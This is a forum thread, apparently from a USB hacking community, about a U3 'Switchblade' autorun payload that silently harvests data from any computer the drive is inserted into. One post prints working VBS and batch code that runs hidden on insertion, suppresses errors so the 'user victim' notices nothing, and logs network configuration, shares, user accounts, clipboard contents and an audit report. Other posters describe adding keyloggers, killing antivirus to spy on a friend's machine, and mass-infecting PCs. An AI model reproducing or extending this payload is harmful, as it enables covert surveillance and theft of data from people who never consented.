Jump to content

~Gozor~ Finished Payload


setzer1411

Recommended Posts

Any chance for an update of the Config tool with an extra check box with which you can enable/disable your own addition?

I'd like to add a keylogger remote install package, but make it nicely switchable from the config menu like all the other items.

I can modify the needed scripts to add my tool and check for the *.dat file, but I can't alter the Config tool.

Having said that; I have a feature suggestion.

We don't all remember to hold the shift key when inserting our U3's in our PC's and we don't all want to disable autorun all the time.

I'm not happy with 'accidentally' infecting myself every time and would like an option (a simple check box would do) that makes installing-hacks runĀ  only once or every time.

An alternate method I think would be to modify the Go.bat to delete the 2.dat and 3.dat files after the execution of the appropriate section so that upon reinsertion the flag now shows not to install the hacks (but that kills the option to mass infect PC's).

Any comments?

Link to comment
Share on other sites

  • Replies 220
  • Created
  • Last Reply

Top Posters In This Topic

Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . .

Ā  Ā  * 1.Ā  Extract the ISO to the root of your flash drive.

Ā  Ā  * 2.Ā  Edit the AUTORUN. INF

Ā  Ā  * 3.Ā  Run SBConfig from your flash drive.

After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?

Link to comment
Share on other sites

Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . .

Ā  Ā  * 1.Ā  Extract the ISO to the root of your flash drive.

Ā  Ā  * 2.Ā  Edit the AUTORUN. INF

Ā  Ā  * 3.Ā  Run SBConfig from your flash drive.

After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?

No sbconfig is only used to customize the payload (eg turn options on or off) if you remove sbconfig.exe the payload will still function the way it is set up but I recommend keeping a copy of sbconfig somewhere in case you need to configure the payload again.

Link to comment
Share on other sites

GonZor i was just wondering if you knew anything about ".job" files or there file format or anything. a few of my buddies are working on a Windows hack that works in a limited account and so far it works just crashes in a limited account. Anyways the hack uses the "System" Login Expliot using an At Command and ect if you would like to help us work on this send me a message.

Link to comment
Share on other sites

GonZor i was just wondering if you knew anything about ".job" files or there file format or anything. a few of my buddies are working on a Windows hack that works in a limited account and so far it works just crashes in a limited account. Anyways the hack uses the "System" Login Expliot using an At Command and ect if you would like to help us work on this send me a message.

You cant use the AT command from a limited account that would be why it is crashing. Basically you are trying to elevate your privileges using an exploit that needs elevated privileges... You need to find another way to elevate your privileges.

Link to comment
Share on other sites

it would be much easier for me to explain this to you via messenger But if your uncomfortable with that i will attempt to elaborate.

Basicly since you cant do an At command in limited user we made a ".job" already made to do that and detect the time and run a minute later the problem is that the scheduled task creates and it looks completely legit and you can see it in the scheduled tasks folder and such but it never executes not even as an admin. and i believe that we need to know about ".job" files i can send you sources and such if you believe you can help us i have many messenger s you can reach me at.

Link to comment
Share on other sites

I made some updates to your scripts, nice job btw.

go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better then crashing and posting a dialog to the user victim.

I've included only what's different otherwise I'm over the max characters for message:

Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next


strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

For Each objDrive in colDrives
Ā  Ā  'ignore floppy drives - reserved by BIOS if they don't exist
Ā  Ā  If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
Ā Ā Ā Ā Ā  Ā  If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then
Ā Ā Ā Ā Ā  Ā  Ā  Ā  strfd = objDrive.Driveletter & ":"
Ā Ā Ā Ā Ā  Ā  End If
Ā Ā Ā Ā Ā  Ā  If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then
Ā Ā Ā Ā Ā  Ā  Ā  Ā  strU3 = objDrive.Driveletter & ":"
Ā Ā Ā Ā Ā  Ā  End If
Ā  Ā  End if
Next




If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then
Ā Ā Ā objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3Ā  & "," & strDate & "," & strTime, 0, False

End If

If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then
Ā Ā Ā objShell.Run ".LaunchU3.exe -a"
Ā Ā Ā 
End If

go.bat

I've added nircmd to grab the clipboard contents and winaudit (google it)

:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off



If %computername%.==. SET computername=computer
If %username%.==. SET username=None

SET fd=%1System
SET U3=%2SystemSRC

CD %U3% >NUL

:: SET LOG PATHS
Ā Ā Ā Ā IF NOT EXIST %fd%Logs%computername% (
Ā Ā Ā Ā Ā Ā Ā Ā MD %fd%Logs%computername%
Ā Ā Ā Ā Ā Ā Ā Ā )

Ā Ā Ā Ā SET logdir=%fd%Logs%computername%
Ā Ā Ā Ā SET log="%fd%Logs%computername%%computername%-[%3-%4].log"
Ā Ā Ā Ā SET tmplog="%fd%Logs%computername%%computername%_TEMP.log"
Ā Ā Ā Ā SET include="%fd%SRCInclude
Ā Ā Ā Ā SET /p eipurl=<"%1SystemSRCIncludeEIP.dat"
Ā Ā Ā Ā SET /p winaud=<"%1SystemSRCIncludewinaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%0.dat" (
Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Ā Ā Ā Ā ECHO +----------------------------------+ >> %log% 2>&1
Ā Ā Ā Ā ECHO +Ā  Ā  Ā  Ā  Ā  [System info]Ā Ā Ā  Ā  Ā  Ā  Ā + >> %log% 2>&1
Ā Ā Ā Ā ECHO +----------------------------------+ >> %log% 2>&1
Ā Ā Ā Ā Ā Ā Ā Ā IPCONFIG /all >> %log% 2>&1

Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +Ā  Ā  Ā  Ā  Ā  Ā  Ā  SharesĀ  Ā Ā Ā  Ā  Ā  Ā  Ā  Ā +Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1 
Ā  Ā Ā Ā Ā Ā Ā Ā Ā net share >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +Ā  Ā  Ā  Ā  Ā  Ā  Ā  UsersĀ  Ā  Ā  Ā  Ā  Ā  Ā  Ā  +Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1 
Ā  Ā Ā Ā Ā Ā Ā Ā Ā net user >> %log% 2>&1
Ā Ā Ā Ā )
Ā Ā Ā Ā 

Ā Ā Ā Ā 
IF EXIST %include%19.dat" (
Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +Ā  Ā  Ā  Ā  Ā  Ā  ClipboardĀ  Ā  Ā  Ā  Ā  Ā  Ā  +Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā  Ā Ā Ā Ā Ā Ā Ā Ā .nircmd.exe clipboard addfile %log%
Ā Ā Ā Ā )

IF EXIST %include%20.dat" (
Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +Ā  Ā  Ā  Ā  Ā  Ā  Win AuditĀ  Ā  Ā  Ā  Ā  Ā  Ā  +Ā  >> %log% 2>&1
Ā Ā Ā Ā Echo +-----------------------------------+Ā  >> %log% 2>&1
Ā  Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā ECHO WinAudit saved to %logdir% >> %log% 2>&1
Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txtĀ  >> %log% 2>&1
Ā  Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā ECHO. >> %log% 2>&1Ā Ā Ā Ā  
Ā Ā Ā Ā )
Ā Ā Ā Ā 
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
Ā Ā Ā Ā EXIT

winaud.dat rtfm for winaudit to see what the switches do

/r=oxutn /o=PDF /m=CA Security Scan

Also for the EIP I use

http://checkip.dyndns.org/

You could use regular expressions to remove the extra HTML

<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>

but it gets the job done and uses a public server

Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)

Link to comment
Share on other sites

Hmm.. this is really good stuff, nice job on improving on what already seems to be an Ace tool.

I'll attempt to implement all the changes myself and add my own little keylogger to it as well.

Any chance you might upload your full scripts somewhere for us to leech?

(I as a noob at scripts and zero knowledge of vbs would like to see if I got the implementation right... I'm learning).

Link to comment
Share on other sites

Nice code

Link to comment
Share on other sites

Thanks a bunch. I got pretty far on my own but definately needed your help.

I like the multitone beeps, I just had three single 2600Hz chimes.

Now I also think I figured out how to make the payload run files from the FD, something my keylogger will be most greatfull for :)

The only other changes I made was add a search history backup and make most outputs in HTML format (looks so much better).

The only (Nir)tool that didn't have command line options was the favorites backup... but I mailed him asking for an update to that (don't know any other way to steal favorites).

You're a sport!

Link to comment
Share on other sites

Complicated even is too complicated to spell for meĀ  :-?

Na, as a real noob I can copy stuff, copy paste stuff and delete stuff. I can think, but I cannot create.

Another small addition I made (read: copy paste) is add avkill to the package. McAffee keeps bugging me when trying to spy, so it's gotta go.

avkill now runs first, next time I'm at my friends place (where I also got the drive error btw) I'll see if I can beat McAffee on the draw and check if the drive issue is gone. Should be another two hurdles taken I think...

Link to comment
Share on other sites

Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

Link to comment
Share on other sites

Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

Firstly nice work on modifying the payload, Secondly the way I see the USB Hacks section is a community project where people build upon others ideas to create something bigger and better. I doubt anyone would object to you rewriting the batchfiles in vbs. Once your done let me know and with your approval it may make its way into the payload, Also if you get stuck I can help.

Link to comment
Share on other sites

If I could just get around th av issue it would be perfect. Also I have been wandering about the code.. I noticed one of the otehr projects had the run disabled if "safety.txt was on the C drive (goto end) and I cant see that anywhere in the code (or am I missing it) hold in mind guys Im just getting the hang of this.

Link to comment
Share on other sites

I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.

@HarshReality

The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure

Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.

The 2 ways I know to keep from scanning yourself:

1. checks for presence of file "X"

2. checks computername/user against list stored in file on U3

Personally I would go with 1, less of paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.

Link to comment
Share on other sites

Ok.Ā  I've been trying to get this to work for about a week or two now, and progress is null.Ā  I'm not a complete newb at using the payloads, just installing them.Ā  Now, I get all the files extracted, and replace the u3custom ISO in the bin folder from GonZor's package, then run the customizer.Ā  It formats the drive with the files on the CD partition and I eject the drive and replace it, then I move the SBConfig file to the Flash part, and run it.Ā  It works.Ā  Now my issue is, when the Switchblade is used on another computer, it doesn't run.Ā  It still works through the Amish technique, and I end up with a successful log, but is there some extra file that was left out of a zip file, or something?

Link to comment
Share on other sites

Do you have the payload on (Theres a button to turn the whole payload on and off at once) and hidden and system files viewable on the machine you're accessing the logs on (you're looking in the system folder for the logs right?)?

If you have those all correct, can you provide me with the following information?

Your PC:

OS

Version of the payload and sbconfig

Test PC:

OS

Autorun disabled (Yes/No)

Link to comment
Share on other sites

Yep. All the files are set up in the correct structure.

Hidden files are shown, and logs are in the system folder.

My PC:

Windows XP MCE 2005

Um...define payload. As in Universal Customizer? Then in that case, 1.0.0.8

SBConfig: 2.0.0.18

Test PC:

Windows XP Home

Autorun enabled

In the start of this thread, I know there is a post showing all the files that are needed for this to run. Now I'm sure that post is outdated, as new files may have been made, but I noticed a "Start.bat" file in that list that needs to be in the original version of that payload. Should I have that?

Link to comment
Share on other sites

hi

this was actually the first payload i ever tried.Ā  i was a bit afraid, cuz i read that it is supposed not to be possible to install it throu VM-systems.Ā  But the only available xp system was my VM.Ā  And i got it to run without a single problem.Ā  I am so happy that i just wanted to let you know :-) and that i realy really like your work!! THUMBS UP!!

What really feels handy is the option to turn U3LP on/off and turn the payload on/off

Would it be also possible to also turn the u3 functionality on/off??

the idea behind it is, that i run into a situation where i simply wanted to use my stick as a storage stick but the host pc didnt even recognize my stick, cuz of the restricted accounts or whatever they did to it, that didnt allow the u3 partition to run. which stoped the whole stick from being recognized.

cuz of me being more into economics than writing codes, i dont know if it is possible

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...